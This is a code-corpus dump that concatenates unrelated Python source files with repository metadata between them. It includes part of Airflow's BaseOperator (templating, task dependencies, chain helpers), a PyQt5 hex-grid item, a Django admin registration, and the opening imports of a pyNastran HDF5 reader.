ghost processes behind.
"""
def __deepcopy__(self, memo):
"""
Hack sorting double chained task lists by task_id to avoid hitting
max_depth on deepcopy operations.
"""
sys.setrecursionlimit(5000) # TODO fix this in a better way
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
shallow_copy = cls.shallow_copy_attrs + cls._base_operator_shallow_copy_attrs
for k, v in self.__dict__.items():
if k not in shallow_copy:
setattr(result, k, copy.deepcopy(v, memo))
else:
setattr(result, k, copy.copy(v))
return result
def __getstate__(self):
state = dict(self.__dict__)
del state['_log']
return state
def __setstate__(self, state):
self.__dict__ = state
self._log = logging.getLogger("airflow.task.operators")
def render_template_fields(
self, context: Context, jinja_env: Optional[jinja2.Environment] = None
) -> None:
"""
Template all attributes listed in template_fields. Note this operation is irreversible.
:param context: Dict with values to apply on content
:type context: dict
:param jinja_env: Jinja environment
:type jinja_env: jinja2.Environment
"""
if not jinja_env:
jinja_env = self.get_template_env()
self._do_render_template_fields(self, self.template_fields, context, jinja_env, set())
def _do_render_template_fields(
self,
parent: Any,
template_fields: Iterable[str],
context: Context,
jinja_env: jinja2.Environment,
seen_oids: Set,
) -> None:
for attr_name in template_fields:
content = getattr(parent, attr_name)
if content:
rendered_content = self.render_template(content, context, jinja_env, seen_oids)
setattr(parent, attr_name, rendered_content)
def render_template(
self,
content: Any,
context: Context,
jinja_env: Optional[jinja2.Environment] = None,
seen_oids: Optional[Set] = None,
) -> Any:
"""
Render a templated string. The content can be a collection holding multiple templated strings and will
be templated recursively.
:param content: Content to template. Only strings can be templated (may be inside collection).
:type content: Any
:param context: Dict with values to apply on templated content
:type context: dict
:param jinja_env: Jinja environment. Can be provided to avoid re-creating Jinja environments during
recursion.
:type jinja_env: jinja2.Environment
:param seen_oids: template fields already rendered (to avoid RecursionError on circular dependencies)
:type seen_oids: set
:return: Templated content
"""
if not jinja_env:
jinja_env = self.get_template_env()
# Imported here to avoid circular dependency
from airflow.models.param import DagParam
from airflow.models.xcom_arg import XComArg
if isinstance(content, str):
if any(content.endswith(ext) for ext in self.template_ext): # Content contains a filepath.
template = jinja_env.get_template(content)
else:
template = jinja_env.from_string(content)
if self.has_dag() and self.dag.render_template_as_native_obj:
return render_template_as_native(template, context)
return render_template_to_string(template, context)
elif isinstance(content, (XComArg, DagParam)):
return content.resolve(context)
if isinstance(content, tuple):
if type(content) is not tuple:
# Special case for named tuples
return content.__class__(
*(self.render_template(element, context, jinja_env) for element in content)
)
else:
return tuple(self.render_template(element, context, jinja_env) for element in content)
elif isinstance(content, list):
return [self.render_template(element, context, jinja_env) for element in content]
elif isinstance(content, dict):
return {key: self.render_template(value, context, jinja_env) for key, value in content.items()}
elif isinstance(content, set):
return {self.render_template(element, context, jinja_env) for element in content}
else:
if seen_oids is None:
seen_oids = set()
self._render_nested_template_fields(content, context, jinja_env, seen_oids)
return content
def _render_nested_template_fields(
self, content: Any, context: Context, jinja_env: jinja2.Environment, seen_oids: Set
) -> None:
if id(content) not in seen_oids:
seen_oids.add(id(content))
try:
nested_template_fields = content.template_fields
except AttributeError:
# content has no inner template fields
return
self._do_render_template_fields(content, nested_template_fields, context, jinja_env, seen_oids)
def get_template_env(self) -> jinja2.Environment:
"""Fetch a Jinja template environment from the DAG or instantiate empty environment if no DAG."""
return (
self.dag.get_template_env()
if self.has_dag()
else airflow.templates.SandboxedEnvironment(cache_size=0)
)
def prepare_template(self) -> None:
"""
Hook that is triggered after the templated fields get replaced
by their content. If you need your operator to alter the
content of the file before the template is rendered,
it should override this method to do so.
"""
def resolve_template_files(self) -> None:
"""Getting the content of files for template_field / template_ext"""
if self.template_ext:
for field in self.template_fields:
content = getattr(self, field, None)
if content is None:
continue
elif isinstance(content, str) and any(content.endswith(ext) for ext in self.template_ext):
env = self.get_template_env()
try:
setattr(self, field, env.loader.get_source(env, content)[0]) # type: ignore
except Exception as e:
self.log.exception(e)
elif isinstance(content, list):
env = self.dag.get_template_env()
for i, item in enumerate(content):
if isinstance(item, str) and any(item.endswith(ext) for ext in self.template_ext):
try:
content[i] = env.loader.get_source(env, item)[0] # type: ignore
except Exception as e:
self.log.exception(e)
self.prepare_template()
@property
def upstream_list(self) -> List["BaseOperator"]:
"""@property: list of tasks directly upstream"""
return [self.dag.get_task(tid) for tid in self._upstream_task_ids]
@property
def upstream_task_ids(self) -> Set[str]:
"""@property: set of ids of tasks directly upstream"""
return self._upstream_task_ids
@property
def downstream_list(self) -> List["BaseOperator"]:
"""@property: list of tasks directly downstream"""
return [self.dag.get_task(tid) for tid in self._downstream_task_ids]
@property
def downstream_task_ids(self) -> Set[str]:
"""@property: set of ids of tasks directly downstream"""
return self._downstream_task_ids
@provide_session
def clear(
self,
start_date: Optional[datetime] = None,
end_date: Optional[datetime] = None,
upstream: bool = False,
downstream: bool = False,
session: Session = NEW_SESSION,
):
"""
Clears the state of task instances associated with the task, following
the parameters specified.
"""
qry = session.query(TaskInstance).filter(TaskInstance.dag_id == self.dag_id)
if start_date:
qry = qry.filter(TaskInstance.execution_date >= start_date)
if end_date:
qry = qry.filter(TaskInstance.execution_date <= end_date)
tasks = [self.task_id]
if upstream:
tasks += [t.task_id for t in self.get_flat_relatives(upstream=True)]
if downstream:
tasks += [t.task_id for t in self.get_flat_relatives(upstream=False)]
qry = qry.filter(TaskInstance.task_id.in_(tasks))
results = qry.all()
count = len(results)
clear_task_instances(results, session, dag=self.dag)
session.commit()
return count
@provide_session
def get_task_instances(
self,
start_date: Optional[datetime] = None,
end_date: Optional[datetime] = None,
session: Session = NEW_SESSION,
) -> List[TaskInstance]:
"""
Get a set of task instance related to this task for a specific date
range.
"""
end_date = end_date or timezone.utcnow()
return (
session.query(TaskInstance)
.filter(TaskInstance.dag_id == self.dag_id)
.filter(TaskInstance.task_id == self.task_id)
.filter(TaskInstance.execution_date >= start_date)
.filter(TaskInstance.execution_date <= end_date)
.order_by(TaskInstance.execution_date)
.all()
)
def get_flat_relative_ids(
self,
upstream: bool = False,
found_descendants: Optional[Set[str]] = None,
) -> Set[str]:
"""Get a flat set of relatives' ids, either upstream or downstream."""
if not self._dag:
return set()
if not found_descendants:
found_descendants = set()
relative_ids = self.get_direct_relative_ids(upstream)
for relative_id in relative_ids:
if relative_id not in found_descendants:
found_descendants.add(relative_id)
relative_task = self._dag.task_dict[relative_id]
relative_task.get_flat_relative_ids(upstream, found_descendants)
return found_descendants
def get_flat_relatives(self, upstream: bool = False):
"""Get a flat list of relatives, either upstream or downstream."""
if not self._dag:
return set()
from airflow.models.dag import DAG
dag: DAG = self._dag
return list(map(lambda task_id: dag.task_dict[task_id], self.get_flat_relative_ids(upstream)))
@provide_session
def run(
self,
start_date: Optional[datetime] = None,
end_date: Optional[datetime] = None,
ignore_first_depends_on_past: bool = True,
ignore_ti_state: bool = False,
mark_success: bool = False,
test_mode: bool = False,
session: Session = NEW_SESSION,
) -> None:
"""Run a set of task instances for a date range."""
from airflow.models import DagRun
from airflow.utils.types import DagRunType
# Assertions for typing -- we need a dag, for this function, and when we have a DAG we are
# _guaranteed_ to have start_date (else we couldn't have been added to a DAG)
if TYPE_CHECKING:
assert self.start_date
start_date = pendulum.instance(start_date or self.start_date)
end_date = pendulum.instance(end_date or self.end_date or timezone.utcnow())
for info in self.dag.iter_dagrun_infos_between(start_date, end_date, align=False):
ignore_depends_on_past = info.logical_date == start_date and ignore_first_depends_on_past
try:
dag_run = (
session.query(DagRun)
.filter(
DagRun.dag_id == self.dag_id,
DagRun.execution_date == info.logical_date,
)
.one()
)
ti = TaskInstance(self, run_id=dag_run.run_id)
except NoResultFound:
# This is _mostly_ only used in tests
dr = DagRun(
dag_id=self.dag_id,
run_id=DagRun.generate_run_id(DagRunType.MANUAL, info.logical_date),
run_type=DagRunType.MANUAL,
execution_date=info.logical_date,
data_interval=info.data_interval,
)
ti = TaskInstance(self, run_id=dr.run_id)
ti.dag_run = dr
session.add(dr)
session.flush()
ti.run(
mark_success=mark_success,
ignore_depends_on_past=ignore_depends_on_past,
ignore_ti_state=ignore_ti_state,
test_mode=test_mode,
session=session,
)
def dry_run(self) -> None:
"""Performs dry run for the operator - just render template fields."""
self.log.info('Dry run')
for field in self.template_fields:
content = getattr(self, field)
if content and isinstance(content, str):
self.log.info('Rendering template for %s', field)
self.log.info(content)
def get_direct_relative_ids(self, upstream: bool = False) -> Set[str]:
"""
Get set of the direct relative ids to the current task, upstream or
downstream.
"""
if upstream:
return self._upstream_task_ids
else:
return self._downstream_task_ids
def get_direct_relatives(self, upstream: bool = False) -> List["BaseOperator"]:
"""
Get list of the direct relatives to the current task, upstream or
downstream.
"""
if upstream:
return self.upstream_list
else:
return self.downstream_list
def __repr__(self):
return "<Task({self.task_type}): {self.task_id}>".format(self=self)
@property
def task_type(self) -> str:
"""@property: type of the task"""
return self.__class__.__name__
def add_only_new(self, item_set: Set[str], item: str, dag_id: str) -> None:
"""Adds only new items to item set"""
if item in item_set:
self.log.warning('Dependency %s, %s already registered for DAG: %s', self, item, dag_id)
else:
item_set.add(item)
@property
def roots(self) -> List["BaseOperator"]:
"""Required by TaskMixin"""
return [self]
@property
def leaves(self) -> List["BaseOperator"]:
"""Required by TaskMixin"""
return [self]
def _set_relatives(
self,
task_or_task_list: Union[TaskMixin, Sequence[TaskMixin]],
upstream: bool = False,
edge_modifier: Optional[EdgeModifier] = None,
) -> None:
"""Sets relatives for the task or task list."""
if not isinstance(task_or_task_list, Sequence):
task_or_task_list = [task_or_task_list]
task_list: List["BaseOperator"] = []
for task_object in task_or_task_list:
task_object.update_relative(self, not upstream)
relatives = task_object.leaves if upstream else task_object.roots
task_list.extend(relatives)
for task in task_list:
if not isinstance(task, BaseOperator):
raise AirflowException(
f"Relationships can only be set between Operators; received {task.__class__.__name__}"
)
# relationships can only be set if the tasks share a single DAG. Tasks
# without a DAG are assigned to that DAG.
dags = {
task._dag.dag_id: task._dag for task in self.roots + task_list if task.has_dag() # type: ignore
}
if len(dags) > 1:
raise AirflowException(
f'Tried to set relationships between tasks in more than one DAG: {dags.values()}'
)
elif len(dags) == 1:
dag = dags.popitem()[1]
else:
raise AirflowException(
f"Tried to create relationships between tasks that don't have DAGs yet. "
f"Set the DAG for at least one task and try again: {[self] + task_list}"
)
if dag and not self.has_dag():
# If this task does not yet have a dag, add it to the same dag as the other task and
# put it in the dag's root TaskGroup.
self.dag = dag
self.dag.task_group.add(self)
for task in task_list:
if dag and not task.has_dag():
# If the other task does not yet have a dag, add it to the same dag as this task and
# put it in the dag's root TaskGroup.
task.dag = dag
task.dag.task_group.add(task)
if upstream:
task.add_only_new(task.get_direct_relative_ids(upstream=False), self.task_id, self.dag.dag_id)
self.add_only_new(self._upstream_task_ids, task.task_id, task.dag.dag_id)
if edge_modifier:
edge_modifier.add_edge_info(self.dag, task.task_id, self.task_id)
else:
self.add_only_new(self._downstream_task_ids, task.task_id, task.dag.dag_id)
task.add_only_new(task.get_direct_relative_ids(upstream=True), self.task_id, self.dag.dag_id)
if edge_modifier:
edge_modifier.add_edge_info(self.dag, self.task_id, task.task_id)
def set_downstream(
self,
task_or_task_list: Union[TaskMixin, Sequence[TaskMixin]],
edge_modifier: Optional[EdgeModifier] = None,
) -> None:
"""
Set a task or a task list to be directly downstream from the current
task. Required by TaskMixin.
"""
self._set_relatives(task_or_task_list, upstream=False, edge_modifier=edge_modifier)
def set_upstream(
self,
task_or_task_list: Union[TaskMixin, Sequence[TaskMixin]],
edge_modifier: Optional[EdgeModifier] = None,
) -> None:
"""
Set a task or a task list to be directly upstream from the current
task. Required by TaskMixin.
"""
self._set_relatives(task_or_task_list, upstream=True, edge_modifier=edge_modifier)
@property
def output(self):
"""Returns reference to XCom pushed by current operator"""
from airflow.models.xcom_arg import XComArg
return XComArg(operator=self)
@staticmethod
def xcom_push(
context: Any,
key: str,
value: Any,
execution_date: Optional[datetime] = None,
) -> None:
"""
Make an XCom available for tasks to pull.
:param context: Execution Context Dictionary
:type: Any
:param key: A key for the XCom
:type key: str
:param value: A value for the XCom. The value is pickled and stored
in the database.
:type value: any pickleable object
:param execution_date: if provided, the XCom will not be visible until
this date. This can be used, for example, to send a message to a
task on a future date without it being immediately visible.
:type execution_date: datetime
"""
context['ti'].xcom_push(key=key, value=value, execution_date=execution_date)
@staticmethod
def xcom_pull(
context: Any,
task_ids: Optional[List[str]] = None,
dag_id: Optional[str] = None,
key: str = XCOM_RETURN_KEY,
include_prior_dates: Optional[bool] = None,
) -> Any:
"""
Pull XComs that optionally meet certain criteria.
The default value for `key` limits the search to XComs
that were returned by other tasks (as opposed to those that were pushed
manually). To remove this filter, pass key=None (or any desired value).
If a single task_id string is provided, the result is the value of the
most recent matching XCom from that task_id. If multiple task_ids are
provided, a tuple of matching values is returned. None is returned
whenever no matches are found.
:param context: Execution Context Dictionary
:type: Any
:param key: A key for the XCom. If provided, only XComs with matching
keys will be returned. The default key is 'return_value', also
available as a constant XCOM_RETURN_KEY. This key is automatically
given to XComs returned by tasks (as opposed to being pushed
manually). To remove the filter, pass key=None.
:type key: str
:param task_ids: Only XComs from tasks with matching ids will be
pulled. Can pass None to remove the filter.
:type task_ids: str or iterable of strings (representing task_ids)
:param dag_id: If provided, only pulls XComs from this DAG.
If None (default), the DAG of the calling task is used.
:type dag_id: str
:param include_prior_dates: If False, only XComs from the current
execution_date are returned. If True, XComs from previous dates
are returned as well.
:type include_prior_dates: bool
"""
return context['ti'].xcom_pull(
key=key, task_ids=task_ids, dag_id=dag_id, include_prior_dates=include_prior_dates
)
@cached_property
def extra_links(self) -> List[str]:
"""@property: extra links for the task"""
return list(
set(self.operator_extra_link_dict.keys()).union(self.global_operator_extra_link_dict.keys())
)
def get_extra_links(self, dttm: datetime, link_name: str) -> Optional[Dict[str, Any]]:
"""
For an operator, gets the URL that the external links specified in
`extra_links` should point to.
:raise ValueError: The error message of a ValueError will be passed on through to
the fronted to show up as a tooltip on the disabled link
:param dttm: The datetime parsed execution date for the URL being searched for
:param link_name: The name of the link we're looking for the URL for. Should be
one of the options specified in `extra_links`
:return: A URL
"""
if link_name in self.operator_extra_link_dict:
return self.operator_extra_link_dict[link_name].get_link(self, dttm)
elif link_name in self.global_operator_extra_link_dict:
return self.global_operator_extra_link_dict[link_name].get_link(self, dttm)
else:
return None
@classmethod
def get_serialized_fields(cls):
"""Stringified DAGs and operators contain exactly these fields."""
if not cls.__serialized_fields:
from airflow.models.dag import DagContext
# make sure the following dummy task is not added to current active
# dag in context, otherwise, it will result in
# `RuntimeError: dictionary changed size during iteration`
# Exception in SerializedDAG.serialize_dag() call.
DagContext.push_context_managed_dag(None)
cls.__serialized_fields = frozenset(
vars(BaseOperator(task_id='test')).keys()
- {
'inlets',
'outlets',
'_upstream_task_ids',
'default_args',
'dag',
'_dag',
'_BaseOperator__instantiated',
}
| {
'_task_type',
'subdag',
'ui_color',
'ui_fgcolor',
'template_ext',
'template_fields',
'template_fields_renderers',
'params',
}
)
DagContext.pop_context_managed_dag()
return cls.__serialized_fields
def is_smart_sensor_compatible(self):
"""Return if this operator can use smart service. Default False."""
return False
@property
def inherits_from_dummy_operator(self):
"""Used to determine if an Operator is inherited from DummyOperator"""
# This looks like `isinstance(self, DummyOperator) would work, but this also
# needs to cope when `self` is a Serialized instance of a DummyOperator or one
# of its sub-classes (which don't inherit from anything but BaseOperator).
return getattr(self, '_is_dummy', False)
def defer(
self,
*,
trigger: BaseTrigger,
method_name: str,
kwargs: Optional[Dict[str, Any]] = None,
timeout: Optional[timedelta] = None,
):
"""
Marks this Operator as being "deferred" - that is, suspending its
execution until the provided trigger fires an event.
This is achieved by raising a special exception (TaskDeferred)
which is caught in the main _execute_task wrapper.
"""
raise TaskDeferred(trigger=trigger, method_name=method_name, kwargs=kwargs, timeout=timeout)
Chainable = Union[BaseOperator, "XComArg", EdgeModifier, "TaskGroup"]
def chain(*tasks: Union[Chainable, Sequence[Chainable]]) -> None:
r"""
Given a number of tasks, builds a dependency chain.
This function accepts values of BaseOperator (aka tasks), EdgeModifiers (aka Labels), XComArg, TaskGroups,
or lists containing any mix of these types (or a mix in the same list). If you want to chain between two
lists you must ensure they have the same length.
Using classic operators/sensors:
.. code-block:: python
chain(t1, [t2, t3], [t4, t5], t6)
is equivalent to::
/ -> t2 -> t4 \
t1 -> t6
\ -> t3 -> t5 /
.. code-block:: python
t1.set_downstream(t2)
t1.set_downstream(t3)
t2.set_downstream(t4)
t3.set_downstream(t5)
t4.set_downstream(t6)
t5.set_downstream(t6)
Using task-decorated functions aka XComArgs:
.. code-block:: python
chain(x1(), [x2(), x3()], [x4(), x5()], x6())
is equivalent to::
/ -> x2 -> x4 \
x1 -> x6
\ -> x3 -> x5 /
.. code-block:: python
x1 = x1()
x2 = x2()
x3 = x3()
x4 = x4()
x5 = x5()
x6 = x6()
x1.set_downstream(x2)
x1.set_downstream(x3)
x2.set_downstream(x4)
x3.set_downstream(x5)
x4.set_downstream(x6)
x5.set_downstream(x6)
Using TaskGroups:
.. code-block:: python
chain(t1, task_group1, task_group2, t2)
t1.set_downstream(task_group1)
task_group1.set_downstream(task_group2)
task_group2.set_downstream(t2)
It is also possible to mix between classic operator/sensor, EdgeModifiers, XComArg, and TaskGroups:
.. code-block:: python
chain(t1, [Label("branch one"), Label("branch two")], [x1(), x2()], task_group1, t2())
is equivalent to::
/ "branch one" -> x1 \
t1 -> t2 -> x3
\ "branch two" -> x2 /
.. code-block:: python
x1 = x1()
x2 = x2()
x3 = x3()
label1 = Label("branch one")
label2 = Label("branch two")
t1.set_downstream(label1)
label1.set_downstream(x1)
t2.set_downstream(label2)
label2.set_downstream(x2)
x1.set_downstream(task_group1)
x2.set_downstream(task_group1)
task_group1.set_downstream(x3)
# or
x1 = x1()
x2 = x2()
x3 = x3()
t1.set_downstream(x1, edge_modifier=Label("branch one"))
t1.set_downstream(x2, edge_modifier=Label("branch two"))
x1.set_downstream(task_group1)
x2.set_downstream(task_group1)
task_group1.set_downstream(x3)
:param tasks: Individual and/or list of tasks, EdgeModifiers, XComArgs, or TaskGroups to set dependencies
:type tasks: List[airflow.models.BaseOperator], airflow.models.BaseOperator,
List[airflow.utils.EdgeModifier], airflow.utils.EdgeModifier, List[airflow.models.XComArg], XComArg,
List[airflow.utils.TaskGroup], or airflow.utils.TaskGroup
"""
from airflow.models.xcom_arg import XComArg
from airflow.utils.task_group import TaskGroup
chainable_types = (BaseOperator, XComArg, EdgeModifier, TaskGroup)
for index, up_task in enumerate(tasks[:-1]):
down_task = tasks[index + 1]
if isinstance(up_task, chainable_types):
up_task.set_downstream(down_task)
continue
if isinstance(down_task, chainable_types):
down_task.set_upstream(up_task)
continue
if not isinstance(up_task, Sequence) or not isinstance(down_task, Sequence):
raise TypeError(f'Chain not supported between instances of {type(up_task)} and {type(down_task)}')
up_task_list = up_task
down_task_list = down_task
if len(up_task_list) != len(down_task_list):
raise AirflowException(
f'Chain not supported for different length Iterable. '
f'Got {len(up_task_list)} and {len(down_task_list)}.'
)
for up_t, down_t in zip(up_task_list, down_task_list):
up_t.set_downstream(down_t)
def cross_downstream(
from_tasks: Sequence[Union[BaseOperator, "XComArg"]],
to_tasks: Union[BaseOperator, "XComArg", Sequence[Union[BaseOperator, "XComArg"]]],
):
r"""
Set downstream dependencies for all tasks in from_tasks to all tasks in to_tasks.
Using classic operators/sensors:
.. code-block:: python
cross_downstream(from_tasks=[t1, t2, t3], to_tasks=[t4, t5, t6])
is equivalent to::
t1 ---> t4
\ /
t2 -X -> t5
/ \
t3 ---> t6
.. code-block:: python
t1.set_downstream(t4)
t1.set_downstream(t5)
t1.set_downstream(t6)
t2.set_downstream(t4)
t2.set_downstream(t5)
t2.set_downstream(t6)
t3.set_downstream(t4)
t3.set_downstream(t5)
t3.set_downstream(t6)
Using task-decorated functions aka XComArgs:
.. code-block:: python
cross_downstream(from_tasks=[x1(), x2(), x3()], to_tasks=[x4(), x5(), x6()])
is equivalent to::
x1 ---> x4
\ /
x2 -X -> x5
/ \
x3 ---> x6
.. code-block:: python
x1 = x1()
x2 = x2()
x3 = x3()
x4 = x4()
x5 = x5()
x6 = x6()
x1.set_downstream(x4)
x1.set_downstream(x5)
x1.set_downstream(x6)
x2.set_downstream(x4)
x2.set_downstream(x5)
x2.set_downstream(x6)
x3.set_downstream(x4)
x3.set_downstream(x5)
x3.set_downstream(x6)
It is also possible to mix between classic operator/sensor and XComArg tasks:
.. code-block:: python
cross_downstream(from_tasks=[t1, x2(), t3], to_tasks=[x1(), t2, x3()])
is equivalent to::
t1 ---> x1
\ /
x2 -X -> t2
/ \
t3 ---> x3
.. code-block:: python
x1 = x1()
x2 = x2()
x3 = x3()
t1.set_downstream(x1)
t1.set_downstream(t2)
t1.set_downstream(x3)
x2.set_downstream(x1)
x2.set_downstream(t2)
x2.set_downstream(x3)
t3.set_downstream(x1)
t3.set_downstream(t2)
t3.set_downstream(x3)
:param from_tasks: List of tasks or XComArgs to start from.
:type from_tasks: List[airflow.models.BaseOperator] or List[airflow.models.XComArg]
:param to_tasks: List of tasks or XComArgs to set as downstream dependencies.
:type to_tasks: List[airflow.models.BaseOperator] or List[airflow.models.XComArg]
"""
for task in from_tasks:
task.set_downstream(to_tasks)
@attr.s(auto_attribs=True)
class BaseOperatorLink(metaclass=ABCMeta):
"""Abstract base class that defines how we get an operator link."""
operators: ClassVar[List[Type[BaseOperator]]] = []
"""
This property will be used by Airflow Plugins to find the Operators to which you want
to assign this Operator Link
:return: List of Operator classes used by task for which you want to create extra link
"""
@property
@abstractmethod
def name(self) -> str:
"""
Name of the link. This will be the button name on the task UI.
:return: link name
"""
@abstractmethod
def get_link(self, operator: BaseOperator, dttm: datetime) -> str:
"""
Link to external system.
:param operator: airflow operator
:param dttm: datetime
:return: link to external system
"""
| 39.201238
| 110
| 0.633536
|
7c4d769146cc973267ce67ce2e90aa8e87baaa78
| 6,748
|
py
|
Python
|
etchlib/graphicsitem/hexcube.py
|
tonningp/pirate-game
|
77070b1c2252c1b42b5763a27a057801998627af
|
[
"MIT"
] | null | null | null |
etchlib/graphicsitem/hexcube.py
|
tonningp/pirate-game
|
77070b1c2252c1b42b5763a27a057801998627af
|
[
"MIT"
] | null | null | null |
etchlib/graphicsitem/hexcube.py
|
tonningp/pirate-game
|
77070b1c2252c1b42b5763a27a057801998627af
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import math
from PyQt5.QtCore import *
from PyQt5.QtGui import (
QPainter,
QColor,
qRgb,
QPen,
QIcon,
QBrush,
QPixmap,
QPainterPath,
QImage,
QFont,
QPolygon,
QPolygonF,
QFontMetrics
)
from PyQt5.QtWidgets import (
QGraphicsObject,
QGraphicsItem
)
from etchlib.defaults import colors
class Item(QGraphicsObject):
"""
http://www.redblobgames.com/grids/hexagons
"""
defaultBrushColor = QColor(colors['Moccasin'])
enterBrushColor = QColor(colors['LightSeaGreen'])
selectedBrush = QColor(colors['LightBlue'])
originBrush = QColor(colors['LightCoral'])
ADJUST = 0.085
hoverEnter = pyqtSignal(object)
hoverLeave = pyqtSignal(object)
changeOrigin = pyqtSignal(object)
def __init__(self,
oid,
grid,
orient='pointy',
cubeline=True,
outline=False,
parent=None):
super(Item, self).__init__(parent)
self.oid = oid
self.grid = grid
self.cubeline=cubeline
self.outline = outline
Item.BoundingRect = grid.block()
self.points_method = getattr(self,orient+'HexCorner')
self.size = self.boundingRect().width()/2
Item.polygon = QPolygonF(self.points())
#self.setFlag(QGraphicsObject.ItemIsMovable,True)
#self.setFlag(QGraphicsObject.ItemSendsScenePositionChanges,True)
self.setFlag(QGraphicsObject.ItemIsSelectable,True)
self.setAcceptHoverEvents(True)
self.pressed = False
self.currentPolyBrush = Item.defaultBrushColor
self.origin = None
def __call__(self):
return QPolygonF(self.polygon)
def setOrigin(self,origin):
self.origin = origin
def isOrigin(self):
return self.origin == self
def boundingRect(self):
return Item.BoundingRect
def center(self):
return Item.BoundingRect.center()
def points(self):
return [self.points_method(self.boundingRect().center(),self.size,i)
for i in range(6)]
def getAngle(self,i):
angle_deg = 60 * i + 30
return math.pi / 180 * angle_deg
def height(self):
return self.size * 2.0
def width(self):
return math.sqrt(3)/2.0 * self.height()
def pointyHexCorner(self,center, size, i):
angle_rad = self.getAngle(i)
x = round(center.x() + size * math.cos(angle_rad))
y = round(center.y() + size * math.sin(angle_rad))
return QPointF(x,y)
def flatHexCorner(self,center, size, i):
angle_rad = self.getAngle(i)
x = round(center.x() + size * math.sin(angle_rad))
y = round(center.y() + size * math.cos(angle_rad))
return QPointF(x,y)
def itemChange(self,change,value):
if change == QGraphicsItem.ItemPositionChange and self.scene():
self.scene().update()
return super(Item,self).itemChange(change,value)
def hoverEnterEvent(self,event):
self.currentPolyBrush = Item.enterBrushColor
self.update()
self.hoverEnter.emit(self)
return super(Item,self).hoverEnterEvent(event)
def hoverLeaveEvent(self,event):
self.currentPolyBrush = Item.defaultBrushColor
self.update()
self.hoverLeave.emit(self)
return super(Item,self).hoverLeaveEvent(event)
def mouseDoubleClickEvent(self,event):
self.changeOrigin.emit(self)
def mousePressEvent(self,event):
self.pressed = True
if event.button() == Qt.RightButton:
self.currentPolyBrush = QColor(colors['MedAquamarine'])
self.update()
return super(Item,self).mousePressEvent(event)
def mouseReleaseEvent(self,event):
self.pressed = False
self.update()
return super(Item,self).mouseReleaseEvent(event)
def shape(self):
path = QPainterPath()
path.addPolygon(Item.polygon)
return path;
def coords(self):
return (self.col - self.origin.col,self.row - self.origin.row)
def isOdd(self,row):
return row % 2
def setToGrid(self,col,row):
self.col = col
self.row = row
rect = self.grid.boundingRect()
adjustWidth = Item.ADJUST*self.width()
if self.isOdd(row):
start = \
QPointF(rect.left()+self.width()+adjustWidth,rect.top()+self.height())
else:
start = \
QPointF(rect.left()+self.width()/2+adjustWidth,rect.top()+self.height())
delta = QPointF(col*self.width(),row*3*self.height()/4)
pos = \
self.mapToItem(self.grid,start+delta)
#print("{},{}".format(pos.x(),pos.y()))
self.setPos(self.mapToScene(pos))
def drawPoints(self,qp):
qp.setPen(Qt.red)
for p in self.points():
qp.drawPoint(p.x(), p.y())
def printPoints(self):
for p in self.points():
print(p)
def drawPos(self,painter):
painter.setPen(Qt.black)
painter.setFont(QFont("Helvetica",5,QFont.Bold))
width = self.boundingRect().width()
height = self.boundingRect().height()
start = self.center() \
- QPointF(width/2 - (.10 * width),0.20*height) #self.boundingRect().height()/2)
painter.drawText(start,"({0:.2f},{1:.2f})".format(self.pos().x(),self.pos().y()))
painter.drawText(start-QPointF(0,.10*height),"({0:.2f},{1:.2f})".format(self.center().x(),self.center().y()))
painter.setPen(Qt.black)
painter.setFont(QFont("Helvetica",5,QFont.Bold))
painter.drawText(self.center(),str(self.oid))
def paint(self, painter, option, widget):
if self.outline:
painter.setPen(QPen(Qt.red,1,Qt.DotLine))
painter.drawRect(self.boundingRect())
if self.isSelected():
painter.setBrush(self.selectedBrush)
elif self.isOrigin():
painter.setBrush(self.originBrush)
else:
painter.setBrush(self.currentPolyBrush)
painter.setPen(Qt.blue)
painter.drawPolygon(Item.polygon)
#painter.drawEllipse(self.center(),1,1)
if self.cubeline:
if self.isSelected() or self.isOrigin():
painter.setPen(QPen(Qt.black,1,Qt.DotLine))
else:
painter.setPen(QPen(Qt.gray,1,Qt.DotLine))
painter.drawLine(self.points()[1],self.center())
painter.drawLine(self.points()[3],self.center())
painter.drawLine(self.points()[5],self.center())
# Notes:
# http://www.redblobgames.com/grids/hexagons/
| 31.53271
| 117
| 0.599733
|
e716fcc79ccb714b48cdbf531f79d53b05933d85
| 153
|
py
|
Python
|
aliases/admin.py
|
6ba/bbgo
|
dfa9b55b8d40c53940105333c2e03a3c6abddb88
|
[
"MIT"
] | 22
|
2017-07-13T04:07:03.000Z
|
2021-06-10T05:39:29.000Z
|
aliases/admin.py
|
genonfire/bbgo
|
5f374f0b620f4dc3e106de5969f26f4585044605
|
[
"MIT"
] | 7
|
2017-08-25T06:33:45.000Z
|
2019-10-14T05:49:32.000Z
|
aliases/admin.py
|
6ba/bbgo
|
dfa9b55b8d40c53940105333c2e03a3c6abddb88
|
[
"MIT"
] | 9
|
2017-12-31T02:45:58.000Z
|
2021-01-22T03:09:02.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from .models import Alias
admin.site.register(Alias)
| 17
| 39
| 0.764706
|
a046b0c8e0867f4f44ebfafedd5e973dffe0e6ad
| 64,172
|
py
|
Python
|
pyNastran/dev/h5/read_h5.py
|
ACea15/pyNastran
|
5ffc37d784b52c882ea207f832bceb6b5eb0e6d4
|
[
"BSD-3-Clause"
] | null | null | null |
pyNastran/dev/h5/read_h5.py
|
ACea15/pyNastran
|
5ffc37d784b52c882ea207f832bceb6b5eb0e6d4
|
[
"BSD-3-Clause"
] | null | null | null |
pyNastran/dev/h5/read_h5.py
|
ACea15/pyNastran
|
5ffc37d784b52c882ea207f832bceb6b5eb0e6d4
|
[
"BSD-3-Clause"
] | null | null | null |
"""
https://public.kitware.com/pipermail/paraview/2016-January/035894.html
https://discourse.paraview.org/t/paraviewweb-visualizer/1268/5
https://discourse.vtk.org/t/appending-data-field-to-a-vtk-file-python-vtk/3220/3
https://www.paraview.org/Wiki/Python_Programmable_Filter
https://stackoverflow.com/questions/54603267/how-to-show-vtkunstructuredgrid-in-python-script-based-on-paraview/54633793#54633793
https://vtkpythonpackage.readthedocs.io/en/latest/index.html
https://cvw.cac.cornell.edu/ParaViewAdv/pythonshell
"""
from itertools import count
from pprint import pprint
from typing import Dict, List, Optional, Any, TYPE_CHECKING
import os
import sys
import vtk # vtk > 9
#import vtkmodules
#vtkmodules.vtkCommonCore.
import h5py
import numpy as np
import pandas as pd
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
